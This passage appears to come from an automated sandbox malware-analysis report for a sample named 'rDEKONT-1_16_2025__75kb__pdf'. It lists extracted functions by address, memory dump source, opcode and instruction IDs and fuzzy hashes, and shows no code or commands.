                                                                                                                                                          • Opcode ID: 6b5f76a13f1ce368e64c662a67636c4095d65ac5c9246cdaaa79bf6c0bf38b9e
                                                                                                                                                          • Instruction ID: 778bd8f1d6d11d200ce2ddade6ee4b94bfca301a70920750c826ea8ee5ce8257
                                                                                                                                                          • Opcode Fuzzy Hash: 6b5f76a13f1ce368e64c662a67636c4095d65ac5c9246cdaaa79bf6c0bf38b9e
                                                                                                                                                          • Instruction Fuzzy Hash: 35214671608340DFDB04DF14EDC0B26BBA5FB84318F20C56DEA095B796C336D866CA62
                                                                                                                                                          Function 00EB5649 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 08f15291e2ac0fbb8269af3e18430bf815c829af6520f4dc07aabc45498be8fc
                                                                                                                                                          • Instruction ID: 6989b685bdae5faf88b801778add61754f3bcb98e9a41ca273c322eac96638f0
                                                                                                                                                          • Opcode Fuzzy Hash: 08f15291e2ac0fbb8269af3e18430bf815c829af6520f4dc07aabc45498be8fc
                                                                                                                                                          • Instruction Fuzzy Hash: 0A210432A05608DFCB15AF24D8447EF3BF1EF49314F20502AF855AB258DB798E51CB90
                                                                                                                                                          Function 00EB4285 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3da11d42784ab33480490721ad96d9b84f848a3b2e797fe2b5d019b75c7642e9
                                                                                                                                                          • Instruction ID: 6f33d9494c42e8ed782474921ff239236a758782dcedd6397fec3978fbdbf2e1
                                                                                                                                                          • Opcode Fuzzy Hash: 3da11d42784ab33480490721ad96d9b84f848a3b2e797fe2b5d019b75c7642e9
                                                                                                                                                          • Instruction Fuzzy Hash: 2A319278E11208CFCB54DFA8E5849ADBBF6FF49304B205469E809AB369D735AD45CF40
                                                                                                                                                          Function 00EB9761 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7dabb78591da1199ec3444d4fe57afb09c4fde25a6731d0a0595b68af9c30059
                                                                                                                                                          • Instruction ID: 2ce2913019448652f2425a6fbbb2c4b8dbb9f9662bc03d065fa80c8a1eb6e11d
                                                                                                                                                          • Opcode Fuzzy Hash: 7dabb78591da1199ec3444d4fe57afb09c4fde25a6731d0a0595b68af9c30059
                                                                                                                                                          • Instruction Fuzzy Hash: A7219C30E002499FCB14CFA5D690AEEBFB6EF49305F248069E555F62A5DB35D941CB20
                                                                                                                                                          Function 00EB6300 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 267f93c275c50929c2b15a19064ad387a7b52ff45e30cba2d72bbe8b016b03ba
                                                                                                                                                          • Instruction ID: 843a34cb6e55e6e68a8bf04eeeb947fc54259ec05e589b1a4885ba1f34e061af
                                                                                                                                                          • Opcode Fuzzy Hash: 267f93c275c50929c2b15a19064ad387a7b52ff45e30cba2d72bbe8b016b03ba
                                                                                                                                                          • Instruction Fuzzy Hash: 9F11A1357046119FC7256A2AD45897FB7E6FFC57A53184078E906EB364CF39DC028B90
                                                                                                                                                          Function 00EBF312 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5e93ac0d017e660fc8024d6a07bb92d4517b48fb817a2e44dc5741b2fb23f743
                                                                                                                                                          • Instruction ID: 9bf0d14340b647815cbf2aa1a9ffc713562b332271173a724df001ac9848287e
                                                                                                                                                          • Opcode Fuzzy Hash: 5e93ac0d017e660fc8024d6a07bb92d4517b48fb817a2e44dc5741b2fb23f743
                                                                                                                                                          • Instruction Fuzzy Hash: 5E214DB0D002099FCB44EFA9D9806DEBFF1FB45300F1095AAD014AB2A5EB745A4ADF81
                                                                                                                                                          Function 00E1D54F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4148976431.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_e1d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                          • Instruction ID: 8d3abb608d4fbb8e11d81fffa2cf277e90a85493eb68700c3f2b9f75d4d84334
                                                                                                                                                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                          • Instruction Fuzzy Hash: 0B11D376508280DFCF16CF14D9C4B56BF72FB94318F24C5A9D8090B656C33AD85ACBA2
                                                                                                                                                          Function 00EBF320 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 07d663be97af7fb715955f42a00136d87a2f5be9a661a50f34c672b05bafe95f
                                                                                                                                                          • Instruction ID: fb98d925b8ca00a290567a25848ef60ecf5bec338f4d6f261cfded37b3d562fb
                                                                                                                                                          • Opcode Fuzzy Hash: 07d663be97af7fb715955f42a00136d87a2f5be9a661a50f34c672b05bafe95f
                                                                                                                                                          • Instruction Fuzzy Hash: C5110AB0D001099FCB44EFA9D98169EBFF1FB45304F1095A9D014AB2A9EB705A4A9B81
                                                                                                                                                          Function 00EB27F0 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 91d6d6518d2522bf600b5c2b00cbe11b1f83d0e69ffdd1f9e0c6d087f2bb5401
                                                                                                                                                          • Instruction ID: 86ee7d50c68f2558b8f45e1e17e9ed7bc6098960bca97e2c3597118eb582d107
                                                                                                                                                          • Opcode Fuzzy Hash: 91d6d6518d2522bf600b5c2b00cbe11b1f83d0e69ffdd1f9e0c6d087f2bb5401
                                                                                                                                                          • Instruction Fuzzy Hash: 1121C0B4D0120A8FCB10EFA9D9446EEBBF0FF19314F10516AD809B2214EB355A85CF90
                                                                                                                                                          Function 00E2D113 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149096181.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_e2d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                          • Instruction ID: caf5f0143945dd2788cce3e5d1b9eba3ae4728ccda9c2f6459ad537ebd1518fd
                                                                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                          • Instruction Fuzzy Hash: D111DD75508280CFDB02CF14E9C4B15BFB1FB84318F24C6AAD9094B696C33AD85ACB62
                                                                                                                                                          Function 00EB5E98 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3d382345bf69be8b95013b07dc2172a18d86c4da5efbd1c1e4a4feb37f00a98a
                                                                                                                                                          • Instruction ID: aa22c142beea172d9e410f4dd3d8b7e7ccf548c09446d7094706e546e3ba2a4a
                                                                                                                                                          • Opcode Fuzzy Hash: 3d382345bf69be8b95013b07dc2172a18d86c4da5efbd1c1e4a4feb37f00a98a
                                                                                                                                                          • Instruction Fuzzy Hash: B101F532B002156FCB619E689800AFF3FE7EBC9350B144026F445E7284CE76CE219794
                                                                                                                                                          Function 00EBE8E8 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7b2e8d58d85013ee92df86fb5a6d1618b4afc395a81a4e499eaf40fabe6ae1fc
                                                                                                                                                          • Instruction ID: 9da9c452482f1fd246a7141c884cc6111c1191e18ea5255a95f5954e7b3e1e4a
                                                                                                                                                          • Opcode Fuzzy Hash: 7b2e8d58d85013ee92df86fb5a6d1618b4afc395a81a4e499eaf40fabe6ae1fc
                                                                                                                                                          • Instruction Fuzzy Hash: 8C111778D0020AEFCB41EFA4E881AEEBBB1FB49300F114165E915A3364D7386A16DF91
                                                                                                                                                          Function 00EBABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 261a257d363707dc13ed3c5bcd04d5ae8644addccfb2f28c1c45706e70dff79d
                                                                                                                                                          • Instruction ID: 7fe516dafb2249034baff68a7c5bd22e06ce3354a351106d2d867e0247dc6e63
                                                                                                                                                          • Opcode Fuzzy Hash: 261a257d363707dc13ed3c5bcd04d5ae8644addccfb2f28c1c45706e70dff79d
                                                                                                                                                          • Instruction Fuzzy Hash: C6F0F6313002104B8B25AA2E9554AABFAEEEFC8B5931D5079E909D7365EE31CC028B81
                                                                                                                                                          Function 00EB9C2C Relevance: .0, Instructions: 30COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 90b8d3b0ede2588e09f840b6692f4fc810b01efdd72fb0f0b594709d36d7b5e8
                                                                                                                                                          • Instruction ID: 300a106da3b1df9036b5c77bc0c098e3c7342ae8d7cad1534adba2d0bf1bae65
                                                                                                                                                          • Opcode Fuzzy Hash: 90b8d3b0ede2588e09f840b6692f4fc810b01efdd72fb0f0b594709d36d7b5e8
                                                                                                                                                          • Instruction Fuzzy Hash: 00F08C72E00118AFDB10DF69E808AEEBBF5EBC8325F10C026EA08D3215D3354A258B90
                                                                                                                                                          Function 00EB6739 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fceb431b0f837071190dd2f7683fa1c21072437adfe4c010aa25c9b4c094ce9a
                                                                                                                                                          • Instruction ID: f016d04318b0fa7996c79fafc7e9e692ae847cd70c6cfbcb8ec8799c8ff3f769
                                                                                                                                                          • Opcode Fuzzy Hash: fceb431b0f837071190dd2f7683fa1c21072437adfe4c010aa25c9b4c094ce9a
                                                                                                                                                          • Instruction Fuzzy Hash: DDE08C30489305AFC742AB30AC818E87FB6EB8235070443A2E0004A17ECF798A8A8B90
                                                                                                                                                          Function 00EB28A2 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d9137b825f46a0f3ba11ff5a60156d48c5282466ed3205cdf41e0ab3cf5e46a0
                                                                                                                                                          • Instruction ID: 5a63fea45e8f692c2a7cc104d22c4b536eadfb65bbc8d3e8c67e8a3a6387585f
                                                                                                                                                          • Opcode Fuzzy Hash: d9137b825f46a0f3ba11ff5a60156d48c5282466ed3205cdf41e0ab3cf5e46a0
                                                                                                                                                          • Instruction Fuzzy Hash: 6AE08636D10226C6CB01E7A0DD040EEB774AFD1321F59462BC56536194FB30629886D1
                                                                                                                                                          Function 00EB28B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 176cd157b24056c916eff6867a4d9d62b98378f95761e28166e639976edec55e
                                                                                                                                                          • Instruction ID: f4ad74a97bf9ab54e41a911c88b5c0185c5ebc42f9a76bdc277d2c17e74f6bbf
                                                                                                                                                          • Opcode Fuzzy Hash: 176cd157b24056c916eff6867a4d9d62b98378f95761e28166e639976edec55e
                                                                                                                                                          • Instruction Fuzzy Hash: 69D02B31D2022B43CB00E7A1DC004DFF738EEC2220B404223D51037000FB302698C2E0
                                                                                                                                                          Function 00EB8EF8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                          • Instruction ID: d8d55fd6ec902cc2f71fb09d10dc67ae7b97417eb307e5e3205e4fda873d87f9
                                                                                                                                                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                          • Instruction Fuzzy Hash: 75C0123320D1282AA224208EBC40AF3AA8DC2C13B8A211137FA5CA3300AC429C8081A8
                                                                                                                                                          Function 00EBD6D4 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fe36c09bd0c2fdd79130518ca0fbae52832c068794a437f8f347e7bbfae3a260
                                                                                                                                                          • Instruction ID: f623dfcfa29392f8440f528de8e10409393e4faaefa0681276d4bd4e58641758
                                                                                                                                                          • Opcode Fuzzy Hash: fe36c09bd0c2fdd79130518ca0fbae52832c068794a437f8f347e7bbfae3a260
                                                                                                                                                          • Instruction Fuzzy Hash: 42D0E234E04009CBCB30DFA8E4844ECBB70EB48321B24542AD825B3216D63454508F00
                                                                                                                                                          Function 00EBAFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4bd15f99ec6a7ad2324839eb9afaa3504e6930854311ca23d119a290f48ffe32
                                                                                                                                                          • Instruction ID: 748cc40cdb43f7431af33ec80f009cc1c2db3c8da0ef12bda12f51757cdba16a
                                                                                                                                                          • Opcode Fuzzy Hash: 4bd15f99ec6a7ad2324839eb9afaa3504e6930854311ca23d119a290f48ffe32
                                                                                                                                                          • Instruction Fuzzy Hash: C1D0673AB40018DFCB149F99E8408DDF7B6FB98221B148116E915A3265C6319925DB64
                                                                                                                                                          Function 00EB6748 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 526310d9e933d0b2826a2e2446b9fa05e0535b92d975d4d536f89fb0a5c2b1d2
                                                                                                                                                          • Instruction ID: 5eb92e4b3db18f85890ecd3b7b998198cabb010708507bf47308b0d1ee5f4dd3
                                                                                                                                                          • Opcode Fuzzy Hash: 526310d9e933d0b2826a2e2446b9fa05e0535b92d975d4d536f89fb0a5c2b1d2
                                                                                                                                                          • Instruction Fuzzy Hash: 07C012309407084EC601FB75EDC5A5977AAEBC0304B849620A0090A6AEEFB8A98E5BD0

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 055C0B30 Relevance: .7, Instructions: 709COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 48e5794eeacd92f7929aaf91637fa0744b242a936dc9675b90308fe88b450516
                                                                                                                                                          • Instruction ID: 7487a5cba220191410095b2b717a7140a83f26b5ed1fedba801344223b2c5622
                                                                                                                                                          • Opcode Fuzzy Hash: 48e5794eeacd92f7929aaf91637fa0744b242a936dc9675b90308fe88b450516
                                                                                                                                                          • Instruction Fuzzy Hash: 7272AE74E05228CFDB64DF69C984BEDBBB2BB49300F1495E9D409A7365DB34AA81CF40
                                                                                                                                                          Function 055C0040 Relevance: .6, Instructions: 596COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5c47cdf51b90bf1b359c6adc565415e04c62b10ead6e06c75c44bc3fe3efa68c
                                                                                                                                                          • Instruction ID: 335f784508c7f4b0db2cde12c341febd6539333f902b6bc576701d458f736122
                                                                                                                                                          • Opcode Fuzzy Hash: 5c47cdf51b90bf1b359c6adc565415e04c62b10ead6e06c75c44bc3fe3efa68c
                                                                                                                                                          • Instruction Fuzzy Hash: 86527B74E01228CFDB64DF65C984B9EBBB2BB89300F1085E9D409A7265DB35AE85CF50
                                                                                                                                                          Function 067DDA28 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0ff35398d5bf6260f2eccd74877fe345d8c6f56221800cdeda80482e6cf55680
                                                                                                                                                          • Instruction ID: a1b2dbc3d2761c31ec3cebd1b3cf36b26dd4dbb52248a04b048780ce0beb1282
                                                                                                                                                          • Opcode Fuzzy Hash: 0ff35398d5bf6260f2eccd74877fe345d8c6f56221800cdeda80482e6cf55680
                                                                                                                                                          • Instruction Fuzzy Hash: 68E1BC74E01218CFDB64DFA9C984B9DBBB2BF88300F2084A9D419B73A5DB355A85CF51
                                                                                                                                                          Function 067DEA58 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4d547cc418ccee56a24b7a93839345f216c6ca300be2ba2003bf10665eaf7b8a
                                                                                                                                                          • Instruction ID: f7125f1600fa369504613349137aac419f738cd4c868f186b74cd610de845b10
                                                                                                                                                          • Opcode Fuzzy Hash: 4d547cc418ccee56a24b7a93839345f216c6ca300be2ba2003bf10665eaf7b8a
                                                                                                                                                          • Instruction Fuzzy Hash: D0D19F74E00218CFDB54DFA5D984BAEBBB2FF89300F1085A9D419AB364DB359A85CF50
                                                                                                                                                          Function 067DEF20 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 07be663fb9efa36069c2a35fa02393303ea6cb55d731328480bc0a634fa0d238
                                                                                                                                                          • Instruction ID: 213c35d15f218890712f5cca6c5da3ad6e64a47349fd7a849c21731b280ecf9c
                                                                                                                                                          • Opcode Fuzzy Hash: 07be663fb9efa36069c2a35fa02393303ea6cb55d731328480bc0a634fa0d238
                                                                                                                                                          • Instruction Fuzzy Hash: 2AD19E74E00218CFDB54DFA5D984BAEBBB2FF89300F1085A9D409AB364DB359A85CF51
                                                                                                                                                          Function 067DF3E8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: af73661a3c1d1ec2391809ed0bb882f7a8741ec7dae6a13e05c4786a1c65dcc7
                                                                                                                                                          • Instruction ID: cae64d2d3f16d2ce14a2407abc808ff549435098a0fa6a20851a708a64f41c75
